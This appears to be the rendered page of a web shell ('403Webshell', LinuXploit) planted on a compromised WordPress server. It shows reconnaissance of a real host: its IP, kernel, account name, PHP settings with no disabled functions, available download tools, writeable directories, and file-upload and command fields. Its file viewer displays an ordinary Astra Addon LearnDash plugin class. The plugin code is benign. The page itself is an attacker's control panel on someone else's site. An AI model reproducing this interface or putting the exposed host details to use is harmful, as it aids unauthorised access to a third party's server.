403Webshell
Server IP : 198.38.94.13  /  Your IP : 216.73.217.33
Web Server : Apache
System : Linux d4744.dxb1.stableserver.net 5.14.0-611.49.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Apr 21 16:39:08 EDT 2026 x86_64
User : revivere ( 1140)
PHP Version : 8.2.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/revivere/www/wp-content/plugins/astra-addon/addons/learndash/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/revivere/www/wp-content/plugins/astra-addon/addons/learndash//class-astra-ext-learndash.php
<?php
/**
 * Typography Extension
 *
 * @package Astra Addon
 */

define( 'ASTRA_ADDON_EXT_LEARNDASH_DIR', ASTRA_EXT_DIR . 'addons/learndash/' );
define( 'ASTRA_ADDON_EXT_LEARNDASH_URI', ASTRA_EXT_URI . 'addons/learndash/' );

if ( ! class_exists( 'Astra_Ext_LearnDash' ) ) {

	/**
	 * Typography Initial Setup
	 *
	 * @since 1.3.0
	 */
	// @codingStandardsIgnoreStart
	class Astra_Ext_LearnDash {
 // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedClassFound
		// @codingStandardsIgnoreEnd

		/**
		 * Member Variable
		 *
		 * @var object instance
		 */
		private static $instance;

		/**
		 *  Initiator
		 */
		public static function get_instance() {
			if ( ! isset( self::$instance ) ) {
				self::$instance = new self();
			}
			return self::$instance;
		}

		/**
		 * Constructor function that initializes required actions and hooks
		 */
		public function __construct() {

			// If plugin - 'LearnDash' not exist then return.
			if ( class_exists( 'SFWD_LMS' ) ) {

				require_once ASTRA_ADDON_EXT_LEARNDASH_DIR . 'classes/class-astra-ext-learndash-markup.php';
				require_once ASTRA_ADDON_EXT_LEARNDASH_DIR . 'classes/class-astra-ext-learndash-loader.php';

				// Include front end files.
				if ( ! is_admin() ) {
					require_once ASTRA_ADDON_EXT_LEARNDASH_DIR . 'classes/dynamic.css.php';
				}
			}
		}
	}

}

if ( apply_filters( 'astra_enable_learndash_integration', true ) ) {

	/**
	 * Kicking this off by calling 'get_instance()' method
	 */
	Astra_Ext_LearnDash::get_instance();
}

Youez - 2016 - github.com/yon3zu
LinuXploit